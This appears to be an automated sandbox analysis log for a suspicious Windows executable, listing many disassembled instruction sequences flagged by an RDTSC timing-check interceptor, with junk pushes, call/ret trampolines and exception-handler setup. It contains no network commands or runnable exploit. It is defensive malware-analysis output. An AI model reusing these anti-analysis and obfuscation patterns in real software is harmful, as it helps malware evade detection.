Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D09472 second address: D0947C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D09594 second address: D0959E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D096AD second address: D096B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D096B7 second address: D096CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F7620BAC884h 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F7620BAC876h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D096CE second address: D09703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F7620C9DE48h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 adc di, 1B1Bh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jno 00007F7620C9DE48h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0A2FF second address: D0A309 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7620BAC876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0A309 second address: D0A31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE51h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0A31E second address: D0A322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0BE24 second address: D0BE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7620C9DE4Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0C037 second address: D0C067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC889h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d je 00007F7620BAC876h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F7620BAC876h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0C067 second address: D0C0B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 movsx edi, cx 0x0000000b push 00000000h 0x0000000d mov esi, dword ptr [ebp+122D3929h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7620C9DE48h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D337Ah], eax 0x00000035 mov esi, dword ptr [ebp+122D1A31h] 0x0000003b add esi, 39F1CC12h 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jng 00007F7620C9DE46h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0C0B8 second address: D0C0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0CA7A second address: D0CA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0D4BE second address: D0D525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, 4C4A2C57h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F7620BAC878h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a jbe 00007F7620BAC87Bh 0x00000030 mov esi, 7D825B73h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F7620BAC878h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D182Bh], edi 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0D23C second address: D0D240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0EB38 second address: D0EB3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0DDF9 second address: D0DDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D0E931 second address: D0E938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D12100 second address: D12105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CC36DE second address: CC36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7620BAC876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: CC36E8 second address: CC36EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D15978 second address: D1597C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1597C second address: D15995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7620C9DE4Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D15995 second address: D15A12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D1D06h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F7620BAC878h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a xor bx, C673h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F7620BAC878h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b sub dword ptr [ebp+1244B223h], ebx 0x00000051 jmp 00007F7620BAC87Eh 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007F7620BAC87Dh 0x0000005f push eax 0x00000060 pop eax 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D16961 second address: D16965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D15C25 second address: D15C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F7620BAC876h 0x0000000f jng 00007F7620BAC876h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D16965 second address: D169C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F7620C9DE48h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 and edi, dword ptr [ebp+122D3B85h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F7620C9DE48h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 movzx edi, si 0x0000004b push eax 0x0000004c push edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 pop edi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D18AAE second address: D18AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620BAC87Dh 0x00000009 popad 0x0000000a push edx 0x0000000b ja 00007F7620BAC876h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 jo 00007F7620BAC876h 0x0000001e pop ecx 0x0000001f jmp 00007F7620BAC87Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D16B26 second address: D16B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D18AE1 second address: D18AE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D18AE6 second address: D18AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push esi 0x00000008 jng 00007F7620C9DE46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D16B43 second address: D16B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D19116 second address: D1918A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a je 00007F7620C9DE46h 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 nop 0x00000013 call 00007F7620C9DE57h 0x00000018 mov edi, ecx 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F7620C9DE48h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 stc 0x00000038 push 00000000h 0x0000003a pushad 0x0000003b movzx ecx, ax 0x0000003e popad 0x0000003f push eax 0x00000040 pushad 0x00000041 push edi 0x00000042 pushad 0x00000043 popad 0x00000044 pop edi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F7620C9DE57h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D192DC second address: D192E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D192E2 second address: D19376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F7620C9DE48h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 pushad 0x00000035 mov dx, AFF6h 0x00000039 popad 0x0000003a mov eax, dword ptr [ebp+122D0E35h] 0x00000040 add di, B244h 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007F7620C9DE48h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 0000001Dh 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 add dword ptr [ebp+122D19FAh], esi 0x00000067 nop 0x00000068 jmp 00007F7620C9DE4Ch 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push edi 0x00000071 pushad 0x00000072 popad 0x00000073 pop edi 0x00000074 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A256 second address: D1A25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFC5 second address: D1AFCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A25A second address: D1A260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFCE second address: D1AFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A260 second address: D1A27D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7620BAC876h 0x00000009 jnc 00007F7620BAC876h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F7620BAC878h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFDB second address: D1AFE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A27D second address: D1A283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1AFE0 second address: D1B061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE57h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F7620C9DE56h 0x00000012 jmp 00007F7620C9DE59h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F7620C9DE48h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 push ebx 0x00000035 pop edi 0x00000036 push 00000000h 0x00000038 or di, 1123h 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 push edx 0x00000044 pop edx 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1A283 second address: D1A287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1B061 second address: D1B06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7620C9DE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D0CF second address: D1D116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620BAC87Bh 0x00000008 jmp 00007F7620BAC888h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 jmp 00007F7620BAC887h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D116 second address: D1D1B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub ebx, dword ptr [ebp+122D3B39h] 0x00000010 jnl 00007F7620C9DE4Ch 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F7620C9DE48h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D2C69h], edi 0x00000038 jmp 00007F7620C9DE4Eh 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007F7620C9DE48h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D1C51h] 0x0000005f xchg eax, esi 0x00000060 jp 00007F7620C9DE4Ah 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 ja 00007F7620C9DE48h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1B1AE second address: D1B22D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7620BAC878h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F7620BAC87Eh 0x00000011 nop 0x00000012 call 00007F7620BAC889h 0x00000017 xor dword ptr [ebp+1245D8E5h], eax 0x0000001d pop edi 0x0000001e push dword ptr fs:[00000000h] 0x00000025 jne 00007F7620BAC87Ch 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 add edi, 28A6EFEAh 0x00000038 mov edi, ecx 0x0000003a mov eax, dword ptr [ebp+122D131Dh] 0x00000040 jl 00007F7620BAC884h 0x00000046 jmp 00007F7620BAC87Eh 0x0000004b push FFFFFFFFh 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1E2B1 second address: D1E2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7620C9DE53h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1E352 second address: D1E356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D356 second address: D1D400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F7620C9DE4Ch 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F7620C9DE4Eh 0x00000012 nop 0x00000013 cmc 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov ebx, dword ptr [ebp+122D3BF5h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F7620C9DE48h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 jmp 00007F7620C9DE59h 0x00000047 push esi 0x00000048 and edi, 0A9424CEh 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [ebp+122D0E21h] 0x00000055 mov bx, ax 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push ecx 0x0000005d call 00007F7620C9DE48h 0x00000062 pop ecx 0x00000063 mov dword ptr [esp+04h], ecx 0x00000067 add dword ptr [esp+04h], 00000019h 0x0000006f inc ecx 0x00000070 push ecx 0x00000071 ret 0x00000072 pop ecx 0x00000073 ret 0x00000074 mov edi, ebx 0x00000076 push eax 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1D400 second address: D1D404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D20430 second address: D20434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D20434 second address: D2044B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7620BAC87Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2044B second address: D204A0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7620C9DE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D188Eh], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F7620C9DE48h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov edi, ebx 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 jo 00007F7620C9DE48h 0x0000003a pushad 0x0000003b popad 0x0000003c jmp 00007F7620C9DE4Bh 0x00000041 popad 0x00000042 push eax 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D1E4B4 second address: D1E4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D20609 second address: D2060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D233E9 second address: D233ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2257E second address: D225B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7620C9DE51h 0x00000008 jmp 00007F7620C9DE59h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D225B4 second address: D225BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D225BA second address: D225BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D2346B second address: D23470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D23470 second address: D23489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE55h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D243F6 second address: D243FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D243FA second address: D24404 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: D235AF second address: D235B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
